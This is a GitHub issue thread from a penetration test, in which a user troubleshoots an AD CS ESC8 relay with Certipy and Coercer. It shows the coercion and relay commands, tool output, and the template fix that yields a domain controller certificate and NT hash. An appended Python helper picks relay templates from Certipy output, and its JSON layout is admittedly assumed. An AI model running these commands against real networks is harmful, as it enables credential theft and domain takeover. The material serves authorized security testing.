Help understanding "relay" issues? #99

Closed
7MinSec opened this issue Oct 24, 2022 · 6 comments

7MinSec commented Oct 24, 2022

Hello!

I'm on a pentest where Certipy has reported a host called "CA" is vulnerable to ESC8.

I set up Certipy in one window as follows:

certipy relay -ca ca.domain.com

In another window I did Coercer with:

coercer.py -u lowprivuser -p mypass -t IP.OF.A.DC -l MY.KALI.IP.ADDRESS

In the Certipy window I get:

Targeting http://ca.domain.com/certsrv/certfnsh.asp
Listening on 0.0.0.0:445
Requesting certificate for 'DOMAIN\\DC$' based on the template 'Machine'
Request ID is 123
Would you like to save the private key? (y/N)

It seems like this is the kind of behavior I'd expect to see if the config was vulnerable to ESC7.

Any help pointing me in the right direction to troubleshoot would be much appreciated!

Thanks,
Brian

jsdhasfedssad commented Oct 24, 2022

Since you are coercing authentication from the machine account of a DC and not a regular machine, try adding the flag "-template DomainController" to the Certipy command. If that template is missing, try "-template KerberosAuthentication". As you can see from the output of Certipy, that defaults to the "Machine" template.

Also note that you probably don't need to authenticate to the DC when coercing from it :)

7MinSec commented Oct 24, 2022

Hello and thanks for the help!

When I run with -template DomainController the tool output says:

Targeting http://ca.domain.com/certsrv/certfnsh.asp
Listening on 0.0.0.0:445
Requesting certificate for 'DOMAIN\\DC$' based on the template 'DomainController'
Template 'DomainController' is not supported by AD CS

If I do -template KerberosAuthentication I get the same sort of thing:

Template 'KerberosAuthentication' is not supported by AD CS

@jsdhasfedssad

Which templates are enabled on the ADCS server? Can you list them using Certipy? Unless of course you think that would be sensitive to share given that you are currently on a pentest.

7MinSec commented Oct 24, 2022

Hello, yeah, I think since this is my first time with ESC8 I might've been approaching this the wrong way. But to answer your question, when I do a find -enabled with Certipy I get (sanitized):

Certificate Authorities
0
CA Name: CA0
DNS Name: CA0.domain.com
...
<snip>
...

Then as I continue down through the Certificate Templates section, I have one called DC that is on the CA0 certificate authority. For Enrollment Rights, Domain Controllers is in the list.

Does that mean I should do certipy relay -ca ca0.domain.com -template DC and then try Coercer again?

@jsdhasfedssad

If you do not see the default templates "DomainController" or "KerberosAuthentication" they may not be published for some reason. Your client may have replaced the "DomainController" template with their own template named "DC". Yes try using that instead.

7MinSec commented Oct 24, 2022

@jsdhasfedssad you're an absolute champ, thank you. YES that was the case in that the DomainController template had been renamed. Once I got the name right the pfx got generated and DC NT hash came shortly after. Cheers!
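The whole thread comes down to one selection problem: the relayed account is a DC machine account, so `-template` must name a template that is enabled, published on the CA you relay to, grants enrollment to a group that DC$ is in (Domain Controllers, not Domain Computers), and allows client authentication so the resulting PFX is usable for PKINIT. The script below, an added example and not Certipy's own code, applies those four checks to `certipy find -json` output and prints the relay command to run. The JSON layout it reads (index-keyed "Certificate Templates" with "Template Name", "Enabled", "Certificate Authorities", "Client Authentication" and "Permissions" -> "Enrollment Permissions" -> "Enrollment Rights") is my assumption about the shape Certipy writes, and the embedded sample is constructed to mirror this thread, with the default DomainController template absent and a custom "DC" template published on CA0 instead.

```python
"""Choose the template(s) for `certipy relay -template` from `certipy find -json`.

Added example for this thread, not Certipy's own code. The JSON key names
below are an assumption about Certipy's -json layout; verify against a real
file before relying on them.
"""
import json

# Constructed sample in the assumed layout (not real output from the thread).
SAMPLE_FIND_JSON = r"""
{
  "Certificate Templates": {
    "0": {"Template Name": "Machine", "Enabled": true,
          "Certificate Authorities": ["CA0"], "Client Authentication": true,
          "Permissions": {"Enrollment Permissions": {"Enrollment Rights":
            ["DOMAIN.COM\\Domain Computers", "DOMAIN.COM\\Domain Admins"]}}},
    "1": {"Template Name": "DC", "Enabled": true,
          "Certificate Authorities": ["CA0"], "Client Authentication": true,
          "Permissions": {"Enrollment Permissions": {"Enrollment Rights":
            ["DOMAIN.COM\\Domain Controllers", "DOMAIN.COM\\Enterprise Admins"]}}},
    "2": {"Template Name": "User", "Enabled": true,
          "Certificate Authorities": ["CA0"], "Client Authentication": true,
          "Permissions": {"Enrollment Permissions": {"Enrollment Rights":
            ["DOMAIN.COM\\Domain Users"]}}},
    "3": {"Template Name": "WebServer", "Enabled": true,
          "Certificate Authorities": ["CA0"], "Client Authentication": false,
          "Permissions": {"Enrollment Permissions": {"Enrollment Rights":
            ["DOMAIN.COM\\Domain Controllers"]}}},
    "4": {"Template Name": "OldDC", "Enabled": false,
          "Certificate Authorities": [], "Client Authentication": true,
          "Permissions": {"Enrollment Permissions": {"Enrollment Rights":
            ["DOMAIN.COM\\Domain Controllers"]}}}
  }
}
"""

# Groups the coerced machine account belongs to, by role. A DC$ account sits in
# Domain Controllers rather than Domain Computers, which is why the default
# "Machine" template does not fit a relay from a DC.
GROUPS_FOR_ROLE = {
    "dc": ("Domain Controllers", "Authenticated Users", "Everyone"),
    "workstation": ("Domain Computers", "Authenticated Users", "Everyone"),
}


def _enrollment_groups(template):
    rights = (template.get("Permissions", {})
                      .get("Enrollment Permissions", {})
                      .get("Enrollment Rights", []))
    # Entries look like "DOMAIN.COM\Domain Controllers"; keep only the group.
    return {r.split("\\", 1)[-1].casefold() for r in rights}


def relay_candidates(find_json, ca_name, role):
    """Templates on ca_name that the coerced account can enrol in and that
    produce a certificate usable for client authentication."""
    wanted = {g.casefold() for g in GROUPS_FOR_ROLE[role]}
    data = json.loads(find_json)
    hits = []
    for tmpl in data.get("Certificate Templates", {}).values():
        if not tmpl.get("Enabled"):
            continue                      # not published anywhere
        if ca_name not in tmpl.get("Certificate Authorities", []):
            continue                      # not published on the relay target CA
        if not tmpl.get("Client Authentication"):
            continue                      # cert could not be used to authenticate
        if _enrollment_groups(tmpl) & wanted:
            hits.append(tmpl["Template Name"])
    return hits


def relay_command(ca_dns_name, template):
    """The Certipy invocation the thread settles on, with the template filled in."""
    return f"certipy relay -ca {ca_dns_name} -template {template}"


if __name__ == "__main__":
    for role in ("dc", "workstation"):
        for name in relay_candidates(SAMPLE_FIND_JSON, "CA0", role):
            print(role, "->", relay_command("ca0.domain.com", name))
```

Run against the sample, the "dc" role yields only the custom DC template (Machine is skipped because Domain Controllers is not Domain Computers, WebServer because it lacks client authentication, OldDC because it is disabled), which is exactly the conclusion the thread reached by hand. Swap in a real `certipy find -json` file and the CA name from its "Certificate Authorities" section to reuse it on an engagement.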
